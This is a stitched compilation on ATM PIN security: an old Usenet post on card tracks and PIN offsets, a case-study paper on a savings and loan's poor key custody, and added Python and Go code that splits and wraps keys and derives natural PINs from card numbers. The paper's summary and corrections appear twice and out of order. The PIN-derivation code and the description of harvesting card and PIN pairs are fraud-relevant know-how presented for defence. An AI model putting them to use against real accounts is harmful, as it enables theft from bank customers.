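            raise ValueError("all components must be KEY_LEN bytes")
        out = bytes(x ^ y for x, y in zip(out, p))
    return out


def split_key(key: bytes, custodians: int) -> list:
    """Split a key into XOR components, one per custodian.  Any subset short
    of all of them is statistically independent of the key, so no single
    officer (or installer) can recover it from what they hold."""
    if custodians < 2:
        raise ValueError("split knowledge needs at least two custodians")
    parts = [secrets.token_bytes(KEY_LEN) for _ in range(custodians - 1)]
    parts.append(xor_bytes(key, *parts))
    return parts


def combine_key(parts: list) -> bytes:
    """Done inside the ATM or host unit as each custodian enters a part."""
    return xor_bytes(*parts)


def wrap_key(kek: bytes, working_key: bytes, key_id: str) -> bytes:
    """Encrypt a working key (PIN key or communication key) under the
    key-encrypting key so it can be sent down-line; the key_id label ties
    the wrapped value to one purpose and one generation."""
    return xor_bytes(working_key, keystream(kek, key_id.encode()))


unwrap_key = wrap_key  # the XOR stand-in is its own inverse


class HostKeyExchange:
    """One host-to-node key relationship: a long-lived KEK assembled from
    custodian components, and working keys the host generates and rotates."""

    def __init__(self, kek_parts: list):
        self.kek = combine_key(kek_parts)
        self.generation = 0

    def issue_working_key(self, purpose: str):
        """Generate a fresh working key and its wrapped form for transmission."""
        self.generation += 1
        working = secrets.token_bytes(KEY_LEN)
        key_id = f"{purpose}-{self.generation}"
        return key_id, working, wrap_key(self.kek, working, key_id)


def node_receive(kek: bytes, key_id: str, wrapped: bytes) -> bytes:
    """Node side: unwrap the working key with the KEK it holds."""
    return unwrap_key(kek, wrapped, key_id)


if __name__ == "__main__":
    # Constructed demo: a KEK split between two officers, never written down whole.
    kek = secrets.token_bytes(KEY_LEN)
    officer_a, officer_b = split_key(kek, 2)
    host = HostKeyExchange([officer_a, officer_b])
    key_id, working, wrapped = host.issue_working_key("comm")
    print("node recovers working key:", node_receive(kek, key_id, wrapped) == working)
    print("one component alone equals the KEK:", officer_a == kek)
```

With the KEK held as components by two officers and the working keys
generated inside the host unit, an observer on the line sees only
wrapped values, and recovering a working key needs every component plus
the captured message, which is the "collusion from at least three
people" the section describes.  Rotation is just another call to
issue_working_key; nothing about the customers' PINs changes when a
communication key is replaced.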

All these areas should be audited in both the system  specification  and
implementation  to  make sure they are not being abridged in the name of
expediency.

6.  Summary
In this view of a single institution, a number of failures in the
security system were shown.  There was a definite failure to
appreciate what was required in the way of security for PINs and for
the keys used to derive PIN information.  An avoidance of up-front
costs for security led to potentially higher costs in the future.  The
key area was the lack of audits of the EFT system by both the
institution and the network, causing potential loss to all
institutions on the network.


Quick Overview of ATM Security (Needs Editing)

From ames!amdahl!nsc!voder!wlbr!gins Mon Jul 13 12:41:23 PDT
Article 479 of sci.crypt:
From: gins@wlbr.UUCP (Fred Ginsburg)
Newsgroups: sci.crypt
Subject: Re: ATM secret codes
Summary: ATM stuff, LONG...
Message-ID: <1038@wlbr.UUCP>
Organization: Eaton IMS, Westlake Village, CA

In article <548@l.cc.purdue.edu>, roz@l.cc.purdue.edu (Vu Qui Hao-Nhien) writes:
> In article <127@ddsw1.UUCP> karl@ddsw1.UUCP (Karl Denninger) writes:
> >In article <192@sugar.UUCP>, karl@sugar.UUCP (Karl Lehenbauer) writes:
>
> The transactions done by ATM sometimes (not always) are kept by the
> machine until removed by human hands and fed to the bank's computer at
> its headquarters.  Hence not much communication between ATM and the
> outside world.
> --

on computer security.  Any questions, give a call (818-706-4146)
or send to {trwrb,ihnp4}!wlbr!gins

***************  Track Layouts ************************

This is off the top of my head, but is 99% there.  Also I'll ignore
some obsolete stuff.

The physical layout of the cards is standard.  The LOGICAL makeup
varies from institution to institution.  There are some generally
followed layouts, but they are not mandatory.

There are actually up to three tracks on a card.

Track 1 was designed for airline use.  It contains your name and
usually your account number.  This is the track that is used when
the ATM greets you by name.  There are some glitches in how things
are ordered so occasionally you do get "Greetings Bill Smith Dr."
but such is life.  This track is also used with the new airline
auto check-in (PSA, American, etc.)

Track 3 is the "OFF-LINE" ATM track.  It contains such
information as your daily limit, limit left, last access, account
number, and expiration date.  (And usually anything I describe in track
2).  The ATM itself could have the ability to rewrite this track to
update information.

Track 2 is the main operational track for online use.  The first thing
on track 2 is the PRIMARY ACCOUNT NUMBER (PAN).  This is pretty
standard for all cards, though no guarantee.  Some additional info
might be on the card such as expiration date.  One interesting item
is the PIN offset.   When an ATM verifies a PIN locally, it usually
uses an encryption scheme involving the PAN and a secret KEY.
This gives you a "NATURAL PIN" (i.e. when they mail you your PIN, this
is how it got generated.)  If you want to select your own PIN, they
would put the PIN OFFSET in the clear on the card.  Just do modulo 10
arithmetic on the Natural PIN plus the offset, and you have the
selected PIN.  YOUR PIN IS NEVER IN THE CLEAR ON YOUR CARD.  Knowing
the PIN OFFSET will not give you the PIN.  This will require the
SECRET KEY.

Hope that answers your question.

************ Deposits at ATMs ************************

Deposits on ATM:

Various banks have various systems.  As an example, at CITIbank
a deposit was made to a specific account.  Your account was updated
with a MEMO update, i.e. it would show up on your balance.  However
it did not become AVAILABLE funds until it was verified by a teller.
On the envelope was Customer ID number, the envelope number and
the Entered dollar amount, the branch # and the Machine #.
There was also a selection for OTHER PAYMENTS.  This allowed you to
dump any deposit into the ATM.

What are you assured then when you deposit to an ATM?

1) You have a banking RECORD (not a receipt at Citibank).  If you
   have this record, there is a VERY high percentage that you
   deposited something at that ATM.

2) Some banks have ways of crediting your deposit RIGHT NOW.
   This could be done by a balance in another account (i.e. a long
   term C.D. or a line of credit.)  That way they can get you if
   you lied.

**************  ATM Splitting a Card in half ***************

   I've worked with about 75% of the types of machines on the market
and NONE of them split a card in half upon swallow.  However, some
NETWORKS have a policy of slicing a card to avoid security
problems.

Trusting an ATM.

Interesting you should bring this up, I'm just brushing up a paper
describing a REAL situation where your card and PIN are in the clear.
This involves a customer using a bank that is part of a network.
All the information was available to folks in DP, if they put in some
efforts to get it.

          Mis-Implementation of an ATM PIN security system

1.  Synopsis
In an EFT (Electronic Funds Transfer) network, a single node which does
not implement the proper security can have effects throughout the
network.  In this paper, the author describes an example of how security
features were ignored, never implemented, and/or incorrectly designed.
The human factors involved in the final implementation are explored by
showing several major vulnerabilities caused by a Savings and Loan and a
regional EFT network's lack of vigilance in installing an EFT network
node.  While using an EFT system as an example, the concepts can be
extrapolated into the implementation of other secured systems.

2.  Background

A small Savings and Loan  was  setting  up  a  small  (10  to  16  ATMs)

proprietary  Automatic  Teller  Machine (ATM) network.  This network was

then intended to link up to a regional network.  The manufacturer of the

institution's  online  banking  processor  sent an on-site programmer to

develop the required interfaces.

An ATM network consists of three main  parts.   The  first  is  the  ATM

itself.   An ATM can have a range of intelligence.  In this case the ATM

was able to decode a  PIN  (Personal  Identification  Number)  using  an

institution  supplied  DES  (Data Encryption Standard) key.  It was then

required to send a request for funds to the host where it would receive

authorization.

The second portion of the network is the ATM controller.  The controller

monitors the transaction, and routes the message  to  the  authorization

processor.   The  controller  would  also generally monitor the physical

devices and statuses of the ATM.

The third portion of the network is the authorization system.   In  this

case  customers  of  the  local  institution  would have the transaction

authorized on the same processor.  Customers  from  foreign  (i.e.   one

that  does not belong to the institution that runs the ATM) institutions

would be authorized by the regional  network.   Authorization  could  be

from  a  run-up  file which maintains establishes a limit on withdrawals

for a  given  account  during  a  given  period.   A  better  method  is

authorization direct from the institution which issued the card.

3.  Security

The system has a two component key system to allow access to the network

by the customer.  The first  is  the  physical  ATM  card  which  has  a

magnetic stripe.  The magnetic stripe contains account information.  The

second component is the Personal Identification Number (PIN).   The  PIN

is hand entered by the customer into the ATM at transaction time.  Given

these  two  parts,  the  network  will  assume  that  the  user  is  the

appropriate customer and allow the transaction to proceed.

The Magnetic stripe is in the clear and may be assume to be reproducible

using various methods, thus the PIN is crucial security.

Security

PIN security

3.1.  PIN security

3.1.1.  PIN key validation method

PINs can be linked up to a particular card in a  number  of  ways.   One

method  puts  the  PIN  into  a central data base in a one-way encrypted

format.  When a PIN is presented, it  would  be  encrypted  against  the

format  in  the  data base.  This method requires a method of encrypting

the PIN given at the ATM, until it can be verified at the central  site.

Problems  can  also  occur if the institution wants to move the PIN data

base to another processor, especially from a different computer vendor.

Another  method  is  to take information on the card, combine it with an

institution PIN encryption key (PIN key) and use that  to  generate  the

PIN.   The institution in question used the PIN key method.  This allows

the customer to be verified at the ATM itself and no transmission of the

PIN  is  required.   The  risk  of  the  system  is  the PIN key must be

maintained under the tightest of security.

The PIN key is used to generate the natural PIN.   This  is  derived  by

taking  the  account number and using DES upon it with the PIN key.  The

resulting number then is decimialized by doing a lookup on  a  16  digit

decimalization  table  to  convert  the  resulting hexadecimal digits to

decimal digits.  An ATM loaded with the appropriate  PIN  key  can  then

validate  a customer locally with no need to send PIN information to the

network, thereby reducing the risk of compromise.

The PIN key requires the utmost security.  Once the PIN  key  is  known,

any  customer's  ATM card, with corresponding PIN can be created given a

customer account number.  The ATM allows for the PIN to  be  entered  at

the  ATM  in  two parts, thus allowing each of two bank officers to know

only one half of the key.  If desired, a terminal  master  key  can  be

loaded and then the encrypted PIN key loaded from the network.

The  decimalization table usually consists of 0 to 9 and 0 to 5, ("0" to

"F" in hexadecimal where "F" = 15).  The decimalization table can be put

into any order, scrambling the digits and slowing down an attacker.  (As

a side note, it could be noted that using the "standard" table, the  PIN

digits  are  weighted  to 0 through 5, each having a 1/8 chance of being

the digit, while 6 through 9 has only a 1/16 chance.)

When handling a foreign card, (i.e.  one that does  not  belong  to  the

institution that runs the ATM), the PIN must be passed on to the network

in encrypted form.  First, however, it must be passed from  the  ATM  to

the  ATM controller.  This is accomplished by encrypting the PIN entered

at  the  ATM  using  a  communication  key  (communication   key),   The

communication  key  is  entered  at  the  ATM much like the PIN key.  In

addition, it can be downloaded from the network.  The PIN  is  decrypted

at  the controller and then reencrypted with the network's communication

key.

                                 - 2 -

Security

PIN security

PIN key validation method

Maintaining  the  the  security  of  the  foreign  PIN  is  of  critical

importance.   Given  the  foreign PIN along with the ATM card's magnetic

image, the perpetrator has access to an account  from  any  ATM  on  the

network.    This  would  make  tracking  of  potential  attackers  quite

difficult, since the ATM and the institution they extract funds from can

be  completely  different from the institution where the information was

gleaned.

Given  that  the  encrypted  PIN  goes  through   normal   communication

processes,  it  could  be  logged  on  the normal I/O logs.  Since it is

subject to such logging, the PIN in any form should be denied  from  the

logging function.

3.2.  Security Violations

While  the EFT network has potential to run in a secured mode given some

of the precautions outlined above, the potential for abuse  of  security

is  quite easy.  In the case of this system, security was compromised in

a number of ways, each leading to the potential loss of funds, and to  a

loss of confidence in the EFT system itself.

3.2.1.  Violations of the PIN key method

The  two  custodian  system simply wasn't practical when ATMs were being

installed all over the state.  Two examples show this:   When  asked  by

the  developer  for the PIN key to be entered into a test ATM, there was

first a massive search for the key, and then it was read to him over the

phone.   The  PIN  key  was  written  on  a scrap of paper which was not

secured.  This is the PIN key that all the customer PINs are  based  on,

and which compromise should require the reissue of all PINs.)

The  importance of a system to enter the PIN key by appropriate officers

of the bank should not be overlooked.  In  practice  the  ATM  installer

might  be the one asked to enter the keys into the machine.  This indeed

was demonstrated in this case where the ATM installer not only had  the

keys  for  the  Savings and Loan, but also for other institutions in the

area.  This was kept in the high security area of the  notebook  in  the

installer's front pocket.

Having  a  Master key entered into the ATM by officers of the bank might

add an additional layer of security to the system.  The actual  PIN  key

would then be loaded in encrypted form from the network.  In the example

above, if the installer was aware of the terminal master key,  he  would

have to monitor the line to derive the actual PIN key.

The  use  of  a downline encrypted key was never implemented, due to the

potential complications and added cost of such a  system.   Even  if  it

was,  once violated, security can only be regained by a complete reissue

of customer PINs with the resulting confusion ensuing.

                                 - 3 -

Security

Security Violations

Network validated PIN Security violations

3.2.2.  Network validated PIN Security violations

Given  the  potential  for untraced transactions, the maintenance of the

foreign PINs security was extremely important.  In the PIN  key  example

above,  any  violation  would  directly  affect  the  institution of the

violators.  This would limit the scope of an investigation, and  enhance

the  chance of detection and apprehension.  The violation of foreign PIN

information has a much wider sphere of attack,  with  the  corresponding

lower chance of apprehension.

The  communication  key  itself  was  never  secured.  In this case, the

developer  handed  the  key  to  the  bank  officers,  to   ensure   the

communication  key  didn't get misplaced as the PIN key did (This way he

could recall it in case it got lost).  Given the communication key,  the

security  violation  potential  is  simple enough.  The programmer could

simply  tap  the  line  between  the  ATM  and  the  controller.    This

information  could  then generate a set of PIN and card image pairs.  He

would even have account balances.

Tapping the line would have been an effort, and worse yet he  could  get

caught.   However,  having  the  I/O  logs could serve the same purpose.

While originally designed to obscure PIN information in  the  I/O  logs,

the  feature was disabled due to problems caused by the regional network

during testing.  The I/O logs would be sent to the developer  any  time

there was a problem with the ATM controller or the network interface.

The  generation of PIN and card image pairs has a potential for even the

most secured system on the network  to  be  attacked  by  the  lapse  in

security  of  a weaker node.  Neither the communication key, nor the PIN

should ever be available in the clear.  This requires  special  hardware

at  the  controller  to  store  this  information.   In  this  case, the

institution had no desire to install a  secured  box  for  storing  key

information.   The  communication key was available in software, and the

PIN was in the clear during the process of decrypting from the  ATM  and

re-encrypting  with  the network key.  Any programmer on the system with

access to the controller could put in a log file to tap off the PINs  at

that point.

The largest failure of the system, though, was not a result of the items

described above.  The largest failure in the system was in the method of

encrypting  the  PIN  before  going  to the network.  This is due to the

failure of the network to have a secured key between sites.  The PIN was

to  be  encrypted  with  a  network  key.   The  network key was sent in

encrypted form from the network to the ATM controller.  However, the key

to  decrypt  the network key was sent almost in the clear as part of the

start-of-day sequence.

Any infiltrator monitoring the  line  would  be  able  to  get  all  key

information  by  monitoring the start-of-day sequence, doing the trivial

decryption of the communication key, and proceeding to gather card image

and PIN pairs.  The infiltrator could then generate cards and attack the

system at his leisure.

                                 - 4 -

Security

Security Violations

Network validated PIN Security violations

The network-ATM controller security failure is the most critical feature

since it was defined by a regional network supporting many institutions.

The network was supposedly  in  a  better  position  to  understand  the

security requirements.

4.  The Human Factors in Security  Violation

It is important the users of a system be appraised of the procedures for

securing the system.  They should understand the risks,  and  know  what

they  are  protecting.   The  bank officers in charge of the program had

little experience with ATM systems.  They were never fully indoctrinated

in  the  consequences of a PIN key or communication key compromise.  The

officers showed great surprise when the developer was able  to  generate

PINs  for  supplied  test cards.  Given the potential risk, nothing more

was done to try to change the PIN key,  even  though,  they  were  quite

aware  that  the  PIN  key was in the developer's possession.  They once

even called the developer for the PIN key when they weren't able to find

it.

The  developer  had a desire to maintain a smooth running system and cut

down on the development time of an  already  over-budget  project.   Too

much security, for example modifying I/O logs, could delay the isolation

or repair of a problem.

The regional network was actually a marketing company who  subcontracted

out  the  data processing tasks.  They failed to recognized the security

problem of sending key information with extremely weak encryption.   The

keys  were  all but sent in the clear.  There seemed to be a belief that

the use of encryption in and of itself caused a network to  be  secured.

The  use  of DES with an unsecured communication key gave the appearance

of a secured link.

The lack of audits of the system, in both design and implementation,
was the final security defect which allowed the system to be
compromised in so many ways.  An example of the Savings and Loan's
internal auditors' failure to understand the problems or the technology
was their insistence that no contract developers be allowed physically
into the computer room.  In fact, access to the computer room was never
required to perform any of the described violations.

5.  Security Corrections

As in any system where security is required, the time to implement it
is at the beginning.  This requires the review of both implementation
and operational plans for the network.  Audits should be performed to
verify that the procedures are followed as described in the plan.
Financing, scheduling and manpower for such audits must be allocated so
that security issues can be addressed.

For this institution, the first step would have been to indoctrinate
the banking officers in the risks in the ATM network, the
vulnerabilities, and the security measures required.

Custodians of all keys should be well aware of their responsibilities
for those keys.  A fall-back system of key recovery must be in place in
case an officer is not available for key entry.

The cost of installing hardware encryption units at the host should be
included in the cost of putting in the system.  The host unit could
generate down-line keys for both the PIN key and the communication key,
thus making it more difficult to derive these keys without collusion
among at least three people.

A secured communications key should be established between the Network
and the institution.  This would allow for the exchange of working
communication keys.  This key should be changed with a reasonable
frequency.

All these areas should be audited in both the system specification and
implementation to make sure they are not being abridged in the name of
expediency.
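The corrections above describe a key hierarchy rather than a single
cipher: a key-encrypting key held as components by several custodians
and assembled only inside the host encryption unit, working PIN and
communication keys sent down-line wrapped under it, and periodic
replacement of the working keys.  The Go program below is an added
illustration, written for this edition and not part of the original
paper or of the institution's system, of what that hierarchy buys and
of what section 4 describes losing.  It splits a key-encrypting key
into three custodian components, shows that two of the three recover
nothing, wraps a PIN key under the assembled key, and derives a PIN
from a card number under the PIN key to show why a developer holding
that key could generate PINs for test cards.  The PIN derivation
follows the IBM 3624 natural-PIN method as an assumption; the paper does
not say how this institution derived PINs.  All keys and the card
number are constructed sample values.  Single-length DES is used only
because it is the cipher the paper discusses; it is obsolete and must
not be used for new systems.

```go
// Added illustration, not the paper's code. Single-length DES is used only because
// it is the cipher the paper discusses; it is obsolete and must not be used today.
package main

import (
	"crypto/des"
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"strings"
)

// splitKey splits an 8-byte key into n custodian components: n-1 random parts and a
// last part equal to the key XOR all of them, so fewer than n parts reveal nothing.
func splitKey(key []byte, n int) ([][]byte, error) {
	if len(key) != 8 || n < 2 {
		return nil, fmt.Errorf("need an 8-byte key and at least two custodians")
	}
	parts := make([][]byte, n)
	last := append([]byte(nil), key...)
	for i := 0; i < n-1; i++ {
		parts[i] = make([]byte, 8)
		if _, err := rand.Read(parts[i]); err != nil {
			return nil, err
		}
		for j := range last {
			last[j] ^= parts[i][j]
		}
	}
	parts[n-1] = last
	return parts, nil
}

// combineKey XORs components back into the KEK; a real host does this only inside the hardware unit.
func combineKey(parts ...[]byte) []byte {
	kek := make([]byte, 8)
	for _, p := range parts {
		for j := range kek {
			kek[j] ^= p[j]
		}
	}
	return kek
}

// desBlock runs one DES block operation; a wrong key gives garbage, not an error.
func desBlock(key, in []byte, decrypt bool) ([]byte, error) {
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, 8)
	if decrypt {
		block.Decrypt(out, in)
	} else {
		block.Encrypt(out, in)
	}
	return out, nil
}

// wrapKey protects an 8-byte working key (PIN or communication key) under the KEK
// for down-line transfer; unwrapKey recovers it at the receiving end.
func wrapKey(kek, working []byte) ([]byte, error)   { return desBlock(kek, working, false) }
func unwrapKey(kek, wrapped []byte) ([]byte, error) { return desBlock(kek, wrapped, true) }

// naturalPIN derives a 4-digit PIN from a 16-digit card number under the PIN key in
// the manner of the IBM 3624 natural-PIN method (an assumption; the paper does not
// say how PINs were derived). Whoever holds the PIN key can run this for any card.
func naturalPIN(pinKey []byte, pan string) (string, error) {
	validation, err := hex.DecodeString(strings.ReplaceAll(pan, " ", "")) // decimal digits are valid hex
	if err != nil || len(validation) != 8 {
		return "", fmt.Errorf("expected 16 card digits")
	}
	enc, err := desBlock(pinKey, validation, false)
	if err != nil {
		return "", err
	}
	pin := []byte(hex.EncodeToString(enc)[:4])
	for i, c := range pin { // decimalise: 0-9 stay, a-f become 0-5
		if c >= 'a' {
			pin[i] = '0' + (c - 'a')
		}
	}
	return string(pin), nil
}

func main() {
	kekClear, _ := hex.DecodeString("0123456789abcdef") // constructed sample keys, not real
	pinKey, _ := hex.DecodeString("fedcba9876543210")
	parts, _ := splitKey(kekClear, 3)
	kek := combineKey(parts...)
	wrapped, _ := wrapKey(kek, pinKey)
	twoOfThree, _ := unwrapKey(combineKey(parts[0], parts[1]), wrapped)
	recovered, _ := unwrapKey(kek, wrapped)
	pin, _ := naturalPIN(recovered, "4000 1234 5678 9010") // constructed card number
	fmt.Printf("wrapped: %x\n2 of 3 parts: %x\nall 3 parts: %x\nPIN: %s\n", wrapped, twoOfThree, recovered, pin)
}
```

Run with go run; the output shows that unwrapping with two of the
three components produces garbage rather than the PIN key.  Changing a
communication key with reasonable frequency, as recommended above, is
then a matter of generating a fresh random 8-byte key and sending it
wrapped under the key-encrypting key, with no further manual key
loading.  Note also what the hierarchy does not fix: once the working
communication key itself has been sent under weak encryption, as
happened here, DES on the link protects nothing, because whoever read
the key can decrypt every message.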

6.  Summary

In this view of a single institution, a number of failures in the
security system were shown.  There was a definite failure to appreciate
what was required in the way of security for PINs and keys used to
derive PIN information.  An avoidance of up-front costs for security
led to potentially higher costs in the future.  The key area was the
lack of audits of the EFT system by both the institution and the
network, causing potential loss to all institutions on the network.
